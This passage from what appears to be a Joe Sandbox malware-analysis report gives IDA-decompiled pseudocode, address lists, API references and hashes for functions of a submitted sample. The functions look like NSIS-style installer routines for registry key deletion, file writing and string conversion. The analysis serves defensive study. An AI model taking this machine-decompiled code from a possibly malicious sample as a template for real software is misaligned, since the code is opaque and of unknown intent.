				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E733312BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M73332784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7333407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7333409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73331510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7333506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7333506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7333506c);
								goto L17;
							case 5:
								_push( *0x7333506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x73335000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E73331381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E73331312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x7333265f
0x73332661
0x73332665
0x73332674
0x73332678
0x7333267d
0x7333267d
0x73332685
0x7333268c
0x73332692
0x00000000
0x73332699
0x00000000
0x00000000
0x733326a1
0x733326a5
0x733326a8
0x733326ac
0x733326b3
0x733326b7
0x733326bd
0x733326bf
0x733326c1
0x733326c1
0x733326c8
0x00000000
0x00000000
0x733326d1
0x00000000
0x00000000
0x733326d8
0x733326de
0x733326e8
0x733326ee
0x733326f3
0x00000000
0x00000000
0x73332714
0x00000000
0x00000000
0x733326fa
0x73332700
0x73332701
0x73332703
0x00000000
0x00000000
0x7333271c
0x7333271e
0x73332724
0x7333272a
0x7333272a
0x00000000
0x00000000
0x73332692
0x7333272d
0x7333272d
0x73332732
0x73332743
0x73332743
0x73332749
0x7333274e
0x73332753
0x7333275f
0x73332764
0x00000000
0x73332769
0x73332755
0x73332756
0x7333276a
0x7333276a
0x73332753
0x7333276b
0x7333276c
0x7333276f
0x73332783

APIs

Part of subcall function 733312BB: GlobalAlloc.KERNELBASE(00000040,?,733312DB,?,7333137F,00000019,733311CA,-000000A0), ref: 733312C5

GlobalFree.KERNEL32 ref: 73332743
GlobalFree.KERNEL32 ref: 73332778

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 28cb87084f7e742666bb55e78a73f75dc99538ded82c08ed7995d38f9f12ab80
Instruction ID: 1e51d942c153863f163e9e1635de9aa12aadc7646b5da57a1c3e872506f8e09f
Opcode Fuzzy Hash: 28cb87084f7e742666bb55e78a73f75dc99538ded82c08ed7995d38f9f12ab80
Instruction Fuzzy Hash: 5F31DE72604209DFE736AF55CD84E6ABBBEFB87300BA4C52DF145C3261C739A8458B61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 73331979 Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73331979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7333506c = _a8;
				_t77 = 0;
				 *0x73335070 = _a16;
				_v12 = 0;
				_v8 = E733312E3();
				_t90 = E733313B1(_t42);
				_t87 = _t85;
				_t81 = E733312E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E733312E3();
					_t77 = E733313B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73331510(_t85, _t90, _t87,  &_v76);
								E73331312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73333050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E73333070(_t59, _t83, _t85);
						} else {
							_t48 = E733330A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73332EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73332F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73332EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73331979
0x73331983
0x7333198c
0x7333198f
0x73331994
0x7333199d
0x733319a6
0x733319a8
0x733319af
0x733319b1
0x733319b4
0x733319bb
0x733319c9
0x733319d2
0x733319d7
0x733319da
0x733319e0
0x733319e0
0x733319e3
0x733319e6
0x733319e9
0x73331ab1
0x73331ab1
0x73331ab4
0x73331b34
0x73331b39
0x73331b48
0x73331b4b
0x73331b53
0x73331b53
0x73331b53
0x73331b55
0x73331b55
0x73331b56
0x73331b56
0x73331b58
0x73331b5a
0x73331b60
0x73331b69
0x73331b7a
0x73331b85
0x73331b85
0x73331b4d
0x73331b2f
0x73331b2f
0x73331b31
0x73331b31
0x00000000
0x73331b31
0x73331b4f
0x73331b51
0x00000000
0x00000000
0x00000000
0x73331b51
0x73331b3d
0x73331b41
0x00000000
0x73331b41
0x73331ab6
0x73331ab6
0x73331ab7
0x73331b26
0x73331b28
0x00000000
0x00000000
0x73331b2a
0x73331b2d
0x00000000
0x00000000
0x00000000
0x73331b2d
0x73331ab9
0x73331ab9
0x73331aba
0x73331af7
0x73331afc
0x73331b19
0x73331b1c
0x00000000
0x00000000
0x73331b1e
0x00000000
0x00000000
0x73331b20
0x73331b22
0x00000000
0x00000000
0x00000000
0x73331b24
0x73331afe
0x73331b03
0x73331b05
0x73331b07
0x73331b09
0x73331b12
0x73331b0b
0x73331b0b
0x73331b0b
0x00000000
0x73331b09
0x73331abc
0x73331abc
0x73331abf
0x73331af0
0x73331af2
0x00000000
0x73331af2
0x73331ac1
0x73331ac1
0x73331ac4
0x73331ad7
0x73331adc
0x73331ae9
0x73331aeb
0x00000000
0x73331aeb
0x73331ade
0x73331ae0
0x00000000
0x00000000
0x73331ae2
0x73331ae5
0x00000000
0x00000000
0x00000000
0x73331ae7
0x73331ac7
0x73331ac8
0x73331ace
0x73331ad0
0x73331ad0
0x00000000
0x73331ac8
0x733319ef
0x73331a68
0x73331a6a
0x73331a6d
0x73331a8b
0x73331a8e
0x73331a94
0x73331a99
0x73331a6f
0x73331a6f
0x73331a73
0x73331a77
0x73331a79
0x73331a79
0x73331a9c
0x73331aa0
0x00000000
0x73331aa6
0x73331aa6
0x73331aa9
0x00000000
0x73331aa9
0x73331aa0
0x733319f1
0x733319f4
0x73331a59
0x73331a5b
0x73331a5d
0x00000000
0x00000000
0x00000000
0x73331a63
0x733319f6
0x733319f9
0x00000000
0x00000000
0x733319fb
0x733319fc
0x73331a32
0x73331a37
0x73331a4f
0x73331a51
0x00000000
0x73331a51
0x73331a39
0x73331a3b
0x00000000
0x00000000
0x73331a41
0x73331a44
0x00000000
0x00000000
0x00000000
0x73331a4a
0x733319fe
0x73331a01
0x73331a28
0x00000000
0x73331a03
0x73331a03
0x73331a04
0x73331a18
0x73331a1a
0x73331a06
0x73331a08
0x73331a0e
0x73331a10
0x73331a10
0x73331a08
0x00000000
0x73331a04

APIs

GlobalFree.KERNEL32 ref: 733319DA
GlobalFree.KERNEL32 ref: 73331B7A
GlobalFree.KERNEL32 ref: 73331B7F

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: d92fa3910f702899a628a122360037b9772183efacdecba06999b976be0d4456
Instruction ID: eea837f30d8e985baa15622a4b7b983bdaa448481a9388ef6616d80679856f3b
Opcode Fuzzy Hash: d92fa3910f702899a628a122360037b9772183efacdecba06999b976be0d4456
Instruction Fuzzy Hash: 8D51B532D00118ABDB32BFA4CC4079DBBBEEB47311FD5C15ED406A3298E775A94687A1

Uniqueness

Uniqueness Score: -1.00%

Function 73332480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E73332480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7333135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E733312E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M733325F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E733313B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E733313B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7333506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7333506c, __eax,  *0x7333506c, 0, 0);
									goto L27;
								case 4:
									__eax = E733312CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E733313B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7333506c =  *0x73335074 + ( *(__esi + 0x18) - 1) *  *0x7333506c * 2 + 0x18;
									 *__ebx =  *0x73335074 + ( *(__esi + 0x18) - 1) *  *0x7333506c * 2 + 0x18;
									asm("cdq");
									__eax = E73331510(__edx,  *0x73335074 + ( *(__esi + 0x18) - 1) *  *0x7333506c * 2 + 0x18, __edx,  *0x73335074 + ( *(__esi + 0x18) - 1) *  *0x7333506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E733312CC(0x73335044);
					goto L10;
				}
			}

0x73332494
0x73332498
0x733324a3
0x733324a3
0x733324aa
0x733324af
0x00000000
0x00000000
0x733324b3
0x733324b6
0x00000000
0x00000000
0x733324bb
0x733324c6
0x733324d6
0x00000000
0x733324cd
0x733324cf
0x733324e5
0x00000000
0x733324e5
0x733324bd
0x733324bd
0x733324e6
0x733324e6
0x733324e8
0x733324ec
0x733324ec
0x733324ef
0x733324ef
0x733324f7
0x733324ff
0x73332502
0x733325c1
0x733325c2
0x733325cd
0x733325f7
0x733325f7
0x733325dd
0x733325e9
0x733325df
0x733325df
0x733325df
0x00000000
0x73332508
0x73332508
0x00000000
0x7333250f
0x00000000
0x00000000
0x73332517
0x00000000
0x00000000
0x73332525
0x73332527
0x00000000
0x00000000
0x73332548
0x7333254e
0x73332551
0x73332553
0x73332563
0x00000000
0x00000000
0x73332530
0x73332535
0x73332538
0x73332539
0x00000000
0x00000000
0x7333256f
0x73332575
0x73332576
0x73332579
0x7333257a
0x7333257c
0x00000000
0x00000000
0x73332588
0x7333258b
0x73332597
0x73332599
0x00000000
0x00000000
0x733325a5
0x733325b1
0x733325b4
0x733325b6
0x733325b9
0x00000000
0x00000000
0x73332508
0x73332502
0x733324db
0x733324e0
0x00000000
0x733324e0

APIs

GlobalFree.KERNEL32 ref: 733325C2

Part of subcall function 733312CC: lstrcpynW.KERNEL32(00000000,?,7333137F,00000019,733311CA,-000000A0), ref: 733312DC

GlobalAlloc.KERNEL32(00000040), ref: 73332548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73332563

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: c5c4144916a621abbdc78ef54f4c42a2cdd37a318da817c30d7cee4dfb45e94e
Instruction ID: 84a026fb2bef84d627a769cec1c5410de8f07f94d623693d2756e152a7c1d99c
Opcode Fuzzy Hash: c5c4144916a621abbdc78ef54f4c42a2cdd37a318da817c30d7cee4dfb45e94e
Instruction Fuzzy Hash: F4419AB1908319EFE735AF25D840F66B7BCFB46310F90C91EE44AC6181E735A685CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
